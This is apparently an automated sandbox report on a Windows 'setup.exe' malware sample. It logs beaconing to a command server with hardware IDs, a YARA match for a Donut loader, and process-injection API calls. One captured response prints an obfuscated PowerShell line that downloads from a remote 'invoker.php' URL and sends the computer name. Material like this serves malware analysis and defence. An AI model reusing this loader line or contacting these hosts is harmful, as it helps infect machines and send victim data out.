                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1644&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1952&delivery_rate=1776155&cwnd=209&unsent_bytes=0&cid=793032d12741b9e1&ts=532&x=0"
2025-01-06 14:40:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
2025-01-06 14:40:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49756
Destination IP: 104.21.96.1
Destination Port: 443
PID: 7468
Process: C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:30 UTC | 268 | OUT | POST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 113
                                                                                                                        Host: regularlavhis.click
2025-01-06 14:40:30 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37
                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C04E036E6F31F2708EEA336AD54C4C07
2025-01-06 14:40:31 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:31 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=orclc7nbmv6dg7nob9grfa4fhv; expires=Fri, 02 May 2025 08:27:10 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlAwZlnkLE4xpx%2B9fKoxf6LoeMICe2qC7SGfUfGzROfgsCkPpePZqozXZJKNfhM4aBKSo%2BB7Om%2BJ%2F59HxHjEHZuzMcl1SVNGfJWaGl%2BOVmjjsVWoGe0mc0%2FZwu%2BaUjglVT4eMid3"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76b14be91a48-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=28419&min_rtt=2001&rtt_var=16537&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1017&delivery_rate=1459270&cwnd=157&unsent_bytes=0&cid=e0ec49c5b2cca096&ts=493&x=0"
2025-01-06 14:40:31 UTC | 218 | IN | Data Raw: 64 34 0d 0a 4c 67 4a 41 44 46 37 2f 61 4b 6d 64 74 6b 74 31 68 75 46 67 70 38 44 77 47 51 48 6f 42 50 64 4c 79 31 53 31 76 78 34 59 54 44 70 31 65 57 4a 35 66 4d 56 4b 77 65 6e 43 4f 77 61 38 76 55 2f 37 37 35 4e 38 5a 70 30 71 68 43 4f 6b 4a 4f 6d 51 4a 69 31 37 44 68 77 30 63 6a 68 71 79 54 53 47 37 64 35 6c 41 66 36 56 51 6f 76 69 6c 6d 30 6a 30 6a 62 62 61 61 35 32 6a 34 35 6a 4e 44 63 59 57 79 42 36 4c 6a 61 4c 48 4e 6e 75 6a 42 64 61 32 73 34 4c 79 36 6d 41 62 33 53 46 62 59 51 2b 6f 6e 72 47 31 33 46 6f 45 42 56 48 62 44 52 54 50 5a 4d 59 39 75 37 65 4b 6c 76 79 6d 52 53 46 37 4e 4a 2f 64 63 6f 2b 78 32 66 70 4d 5a 65 46 4c 6d 55 52 0d 0a
                                                                                                                        Data Ascii: d4LgJADF7/aKmdtkt1huFgp8DwGQHoBPdLy1S1vx4YTDp1eWJ5fMVKwenCOwa8vU/775N8Zp0qhCOkJOmQJi17Dhw0cjhqyTSG7d5lAf6VQovilm0j0jbbaa52j45jNDcYWyB6LjaLHNnujBda2s4Ly6mAb3SFbYQ+onrG13FoEBVHbDRTPZMY9u7eKlvymRSF7NJ/dco+x2fpMZeFLmUR
2025-01-06 14:40:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49757
Destination IP: 185.161.251.21
Destination Port: 443
PID: 7468
Process: C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:32 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Host: cegu.shop
2025-01-06 14:40:32 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.2
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:32 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Content-Length: 329
                                                                                                                        Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                        Connection: close
                                                                                                                        ETag: "676c9e2a-149"
                                                                                                                        Accept-Ranges: bytes
2025-01-06 14:40:32 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                        Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                        Target ID:0
                                                                                                                        Start time:09:40:01
                                                                                                                        Start date:06/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\setup.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                        Imagebase:0xc00000
                                                                                                                        File size:74'715'544 bytes
                                                                                                                        MD5 hash:86A4951D8E5A083679B90F2509F215FE
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:2.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:32.6%
                                                                                                                          Signature Coverage:31.7%
                                                                                                                          Total number of Nodes:482
                                                                                                                          Total number of Limit Nodes:41
                                                                                                                          execution_graph 90076 303f203 90077 30423b0 90076->90077 90078 303f208 RtlFreeHeap 90077->90078 90079 c34f41 90080 c34f45 90079->90080 90082 c34f5b 90079->90082 90080->90082 90083 c3e41c 7 API calls 3 library calls 90080->90083 90083->90082 90084 303bb80 90085 303bba8 90084->90085 90088 303bc35 90085->90088 90093 3040be0 LdrInitializeThunk 90085->90093 90086 303bd6d 90088->90086 90090 303bcc7 90088->90090 90092 3040be0 LdrInitializeThunk 90088->90092 90090->90086 90094 3040be0 LdrInitializeThunk 90090->90094 90092->90088 90093->90085 90094->90090 90226 c46e80 90227 c46e8c __FrameHandler3::FrameUnwindToState 90226->90227 90251 c47088 90227->90251 90229 c46e93 90230 c46fe6 90229->90230 90239 c46ebd ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 90229->90239 90267 c47b31 4 API calls 2 library calls 90230->90267 90232 c46fed 90268 c80a3b 21 API calls __FrameHandler3::FrameUnwindToState 90232->90268 90234 c46ff3 90269 c809ff 21 API calls __FrameHandler3::FrameUnwindToState 90234->90269 90236 c46ffb 90237 c46edc 90238 c46f5d 90263 c47c46 GetStartupInfoW _memcpy_s 90238->90263 90239->90237 90239->90238 90241 c46f56 90239->90241 90262 c80a15 39 API calls 3 library calls 90241->90262 90243 c46f63 90264 c47c7b GetModuleHandleW 90243->90264 90245 c46f7f 90245->90232 90246 c46f83 90245->90246 90247 c46f8c 90246->90247 90265 c809f0 21 API calls __FrameHandler3::FrameUnwindToState 90246->90265 90266 c471f9 75 API calls ___scrt_uninitialize_crt 90247->90266 90250 c46f94 90250->90237 90252 c47091 90251->90252 90270 c47d7f IsProcessorFeaturePresent 90252->90270 90254 c4709d 90271 c6fcab 10 API calls 2 library calls 90254->90271 90256 c470a2 90257 c470a6 90256->90257 90272 c81105 90256->90272 90257->90229 90260 c470bd 90260->90229 90262->90238 90263->90243 90264->90245 90265->90247 90266->90250 
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $ $"$"$$$$$%$&$($*$+$1$2$3$4$5$8$9$:$<$<$>$?$A$C$C$D$D$D$E$E$F$F$G$G$H$I$J$K$L$P$Q$S$U$U$W$Y$Y$Y$[$[$[$]$_$_$`$`$`$`$b$c$f$t$x$x$|$~
                                                                                                                          • API String ID: 0-3106034677
                                                                                                                          • Opcode ID: 821484b8c87cad604e257fdec91d106163c266f0b12a8e60be5635fab67c5693
                                                                                                                          • Instruction ID: c85bf48d990ee15a569837e904d09b33bb84064b9c1aef77646f1ba8c99accdb
                                                                                                                          • Opcode Fuzzy Hash: 821484b8c87cad604e257fdec91d106163c266f0b12a8e60be5635fab67c5693
                                                                                                                          • Instruction Fuzzy Hash: 3413CE7550E7C08AD335DB38888839FBBE1AB96324F084E6DE4E98B3D2D77984458753

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.COMBASE( )*+,00000000,00000001,?,00000000), ref: 0303C1ED
                                                                                                                          • SysAllocString.OLEAUT32(F90FFF0C), ref: 0303C27F
                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0303C2BD
                                                                                                                          • SysAllocString.OLEAUT32(6A84749C), ref: 0303C32C
                                                                                                                          • SysAllocString.OLEAUT32(A579AB79), ref: 0303C403
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0303C475
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                          • String ID: )*+$?<$Z[$q
                                                                                                                          • API String ID: 65563702-2964544060
                                                                                                                          • Opcode ID: 5d9a81aad9d40283bce3575497ffe3ac98584f4f615fb646c44a360a15815a21
                                                                                                                          • Instruction ID: c85148d5aa3d86ecbd36c5835e6dd8a63345a93243bcca2ca272e0f0c539ea38
                                                                                                                          • Opcode Fuzzy Hash: 5d9a81aad9d40283bce3575497ffe3ac98584f4f615fb646c44a360a15815a21
                                                                                                                          • Instruction Fuzzy Hash: 5052CCB56093418FE324CF24C88179BFBE5EF86314F08892DE995DB291D778D909CB92
                                                                                                                          APIs
                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 010737CE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 01073876
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01073BEA
                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 01073C9F
                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 01073CBC
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 01073D5F
                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 01073D92
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01073F03
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1248616170-0
                                                                                                                          • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                          • Instruction ID: 13154cba0d353ccf9e1b5be08b123f8baa0aab19f8e89af97ac9e73b73e5c76f
                                                                                                                          • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                          • Instruction Fuzzy Hash: C9428971A08341AFEB64DF28C844B6BBBE9FF88700F04496DFA859B251D770E844DB55

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 807 300c5ae-300c7af 808 300c7b0-300c7f7 807->808 808->808 809 300c7f9-300c801 808->809 810 300c805-300c821 809->810
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !hin$-X ^$=D$Z$T$X:$[ W&$^8>$eTbj$l\hR${H{N
                                                                                                                          • API String ID: 0-4204190240
                                                                                                                          • Opcode ID: 253cd2c3c1ee0c0b6f6d559d889915b74475a7d09d4f4d1e008942d5e0312986
                                                                                                                          • Instruction ID: ab9f69ee8414dc68200bdaaad0afd511121e6e53651bf7d459730f30c9c1a9ff
                                                                                                                          • Opcode Fuzzy Hash: 253cd2c3c1ee0c0b6f6d559d889915b74475a7d09d4f4d1e008942d5e0312986
                                                                                                                          • Instruction Fuzzy Hash: DD511BF4925340CFE718DF658A88BA87EA1BB05200F1A82EDC2596F236C7799446CF94

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 03008874
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0300887E
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 03008933
                                                                                                                          • GetForegroundWindow.USER32 ref: 03008948
                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 03008B99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentThread$ExitFolderForegroundPathProcessSpecialUserWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2442286830-0
                                                                                                                          • Opcode ID: d9e1a6971104820b7970dc33e849810a61c11ff537098efbfa45da0a9456e772
                                                                                                                          • Instruction ID: 951beda474b4cef76d23da7044300f3653013914ff6e18332d1129dd274a92dc
                                                                                                                          • Opcode Fuzzy Hash: d9e1a6971104820b7970dc33e849810a61c11ff537098efbfa45da0a9456e772
                                                                                                                          • Instruction Fuzzy Hash: 7A814BB7B157144BD308EE688C953ABF6D6ABC4310F0E853CA998DB3D0EA788D0586C5

                                                                                                                          Control-flow Graph
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,010205CB,?,00000001,?,81EC8B55,000000FF), ref: 01020AC3
                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 01020AEF
                                                                                                                          • Wow64SuspendThread.KERNEL32(00000000), ref: 01020B42
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01020B6C
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01020BA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2720937676-0
                                                                                                                          • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                          • Instruction ID: b1f1d161ab14176cbebff5b3bdb352c5ae2499fc190d91746101a02c17157243
                                                                                                                          • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                          • Instruction Fuzzy Hash: 28410E75A00218AFDB18DF9CC890BADBBF6EF88300F10C168E6559B794DA34EE45CB54

                                                                                                                          Control-flow Graph
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: /$=$Bz$C04E036E6F31F2708EEA336AD54C4C07
                                                                                                                          • API String ID: 0-986211074
                                                                                                                          • Opcode ID: 7a837ed5a5d699415ed313f111c069e1123c76e93cb746d3ccb662bc285ea8fe
                                                                                                                          • Instruction ID: af5d4a08ee52d7aba9323732bc7a189db94bc5e2ff03397a3dff296a8c2ef103
                                                                                                                          • Opcode Fuzzy Hash: 7a837ed5a5d699415ed313f111c069e1123c76e93cb746d3ccb662bc285ea8fe
                                                                                                                          • Instruction Fuzzy Hash: FFC1EDB16097808FE314DF25C8A4BABBBE5EFC1308F14492DE1D58B392DB798509CB46

                                                                                                                          Control-flow Graph
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Uninitialize
                                                                                                                          • String ID: regularlavhis.click
                                                                                                                          • API String ID: 3861434553-469915533
                                                                                                                          • Opcode ID: 794502ab8df404e332346170b80c61dbe75bfca67f2e988447f08159ba37dca6
                                                                                                                          • Instruction ID: 897a5765f38a6d1ebbcf0dc125a1935bb41797b451ddd4193a23e048b8bbf5b2
                                                                                                                          • Opcode Fuzzy Hash: 794502ab8df404e332346170b80c61dbe75bfca67f2e988447f08159ba37dca6
                                                                                                                          • Instruction Fuzzy Hash: AC22BEB51067818FE759CF29C4A0722BFE2BF96300F18968CC4C64F78AD779A405CBA1

                                                                                                                          Control-flow Graph
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: dd369c2467f12f22f4b5a85d25844aba2df978d119364432f2b2b13dbb0915e8
                                                                                                                          • Instruction ID: 0337f5321c4b58ca5d6d55f37c8ed4e339e1868e33c97beeca5a2e61bbbc3352
                                                                                                                          • Opcode Fuzzy Hash: dd369c2467f12f22f4b5a85d25844aba2df978d119364432f2b2b13dbb0915e8
                                                                                                                          • Instruction Fuzzy Hash: C5A24473D143248F9758EFF9EC86B6F3653F790310386822EE902C7566DF38454AAA85

                                                                                                                          Control-flow Graph
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 8ea2e2618b6e6edc97158ba4fe73556ea2f7395a604561f0424a7f40c4f88d02
                                                                                                                          • Instruction ID: d56a39de4745bc0ac86f65277f171876b1042107c7c877036cbfa078665d7c95
                                                                                                                          • Opcode Fuzzy Hash: 8ea2e2618b6e6edc97158ba4fe73556ea2f7395a604561f0424a7f40c4f88d02
                                                                                                                          • Instruction Fuzzy Hash: F5922472D143248F9758EFF9EC86B6F3653FBC0310385822EE506C7566CF38458AAA85
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 1265a7ba15ea33c2b7f85c2cae139dd4f6fe2dbc045da86f09b2d868b1205969
                                                                                                                          • Instruction ID: 709b7aa519e929c5e4bab4363fa1aa1dc23331ca7e08eefc8317504db6751d85
                                                                                                                          • Opcode Fuzzy Hash: 1265a7ba15ea33c2b7f85c2cae139dd4f6fe2dbc045da86f09b2d868b1205969
                                                                                                                          • Instruction Fuzzy Hash: 65822572D143248F9758EFF9EC86B6F3663F7C0315381822EE506C7566CF38458AAA85
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
APIs
• CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
